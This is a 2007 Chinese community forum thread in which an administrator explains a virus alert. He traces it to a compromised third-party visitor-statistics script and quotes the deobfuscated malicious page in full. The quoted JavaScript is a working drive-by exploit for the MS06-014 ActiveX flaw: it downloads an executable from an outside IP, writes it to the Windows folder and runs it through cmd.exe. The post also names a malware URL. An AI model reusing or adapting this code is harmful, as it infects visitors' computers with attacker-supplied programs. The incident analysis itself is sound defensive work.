山药蛋社区 » 站务公开 » 贴个图在附件了

candy521517 发表于 2007-11-7 15:21

贴个图在附件了

在附件里了，可以打开看看

seven 发表于 2007-11-7 19:09

请耗子赶紧解答下，个人看不是山药蛋有病毒，可能是脚本之类。

wu3537 发表于 2007-11-9 11:22

我总算知道了什么叫城门失火殃及池鱼了。

昨天晚上和老汉RPG到12点多吧，把论坛300多M的全部网页下到我的硬盘上来
扫描了下dywoyk关键字没结果
耐着性子把需要首页加载的页全一个一个看过去
总得有数万行代码吧？好大的工程量啊

看完以后也没发现问题。
可以肯定咱们的网站上是没问题的，可问题在哪儿呢？

闹了大半夜终于发现咱们用的ITSUN统计他的站上被挂马了。

查了一下，有个具体分析我贴下面了。
ITSUN统计我先去掉了

去itsun的官网，找了一些用itsun统计的站点，什么上海福彩网啊，神州博客网啊，里面排名第一的祝福网啊，进去都发现病毒了，都是指向同一个地址[color=#ff0000]http://999.dywoyk88.cn/most.exe[/color]


第一次加载统计代码返回的页面内容里包括一个病毒网页，是用的MS06-014的漏洞
还原后为
[quote]
<SCRIPT LANGUAGE="JavaScript">
function HJAakes(Sv1){var KNrycBWeT2 = window["Math"]["random"]()*Sv1;return window["Math"]["round"](KNrycBWeT2)+'.exe';
}
var NgAAJLAn3;
q3wMT2="Mi"
var AitHa;
wI9wV1="cr"
AitHa=window["document"]
var SegsW$Ys5="object"
NgAAJLAn3=AitHa["createElement"]("object");
qI9wV1="oso"
xI9wV1="ft"+"."
rI9wV1="XMLHTTP"
shQrF2="clsid"+""
e4oQF3=":BD9"+"6C"+"556"+"-"+"6"+"5A3-11"+"D0-9"+"83A"+"-"+"00C04F"+"C2"+"9E36"
NgAAJLAn3["setAttribute"]("classid",shQrF2+e4oQF3);
sI9wV1=q3wMT2+wI9wV1+qI9wV1
tI9wV1=xI9wV1+rI9wV1
mI9wV1=sI9wV1+tI9wV1
U6Sfe="Ad"
r2yMT2="Stream"
q2yMT2="odb."
var Z6;
w2yMT2=U6Sfe+q2yMT2+r2yMT2
Z6=NgAAJLAn3["CreateObject"](mI9wV1,"");
var XbzVF2;
wKpi34="ET"
XbzVF2=NgAAJLAn3["CreateObject"](w2yMT2,"");
Zs7wV1="G"
QArTw="e"
rDmnq1="Sc"
JyeHaeewe=HJAakes(300);
IRAM9="ri"
KRAM9="pti"
VjBxU2="ng.Fi"
SArTw="ppl"
TArTw="ication"
HFh3V2="leSy"
XbzVF2["type"]=1;
NPtIU3="stemObject"
var H8=NgAAJLAn3["CreateObject"](rDmnq1+IRAM9+KRAM9+VjBxU2+HFh3V2+NPtIU3,"");
var WROpGcr9=H8["GetSpecialFolder"](0);
Z6["open"](Zs7wV1+wKpi34, 'http://222.73.254.67/moon.exe',0);
var vkvMT2;
Z6["send"]();
vkvMT2=H8["BuildPath"](WROpGcr9,"sys"+JyeHaeewe);
JyeHaeewe= H8["BuildPath"](WROpGcr9,JyeHaeewe);
OAKeh4="Sh"
RArTw="ll.A"
XbzVF2["Open"]();
UArTw=OAKeh4+QArTw+RArTw
VArTw=SArTw+TArTw
var Y11=NgAAJLAn3["CreateObject"](UArTw+VArTw,"");
XbzVF2["Write"](Z6["responseBody"]);
XbzVF2["SaveToFile"](JyeHaeewe,2);
H8["MoveFile"](JyeHaeewe,vkvMT2);
XbzVF2["Close"]();
D6Nbu3="op"
var XwIb12=H8["BuildPath"](WROpGcr9+'\\system32','cmd.exe')
t2gjy2="e"+"n"
var AJo13=' /c '+vkvMT2
NgAAJLAn3["CreateObject"](UArTw+VArTw,"")
["sHeLlexEcUtE"](XwIb12,AJo13,"",D6Nbu3+t2gjy2,0);
</SCRIPT>
<script language="JavaScript">
<!--
function killErrors() {
return true;
}
window.onerror = killErrors;
// -->
</script>
</body>
</html><NOSCRIPT><b><font color=red>这个页面需要Javascript支持的浏览器!!!            </font></b></NOSCRIPT>
</PRE></BODY>

[/quote]

再次访问就没了。

wu3537 发表于 2007-11-9 11:32

另外说一句，因为这个木马本身并不存在在山药蛋本站，山药蛋本站网页也并没被修改，
而是统计代码站统计返回页感染病毒后通过统计代码加载的！更要命的是他并不是每次都加载木马页，隐蔽行非常好。

非常感谢会员candy521517 ，特奖励贡献值1点！

欢迎大家提出问题！

双心木 发表于 2007-11-9 13:09

请允许我麻木的葱白一下耗子~~~~

seven 发表于 2007-11-12 08:35

也允许我葱白下。

scorpion洋 发表于 2007-11-12 13:58

偶滴神啊@funk:

candy521517 发表于 2007-11-19 14:18

耗子 你真行 啊 呵呵

查看完整版本: 贴个图在附件了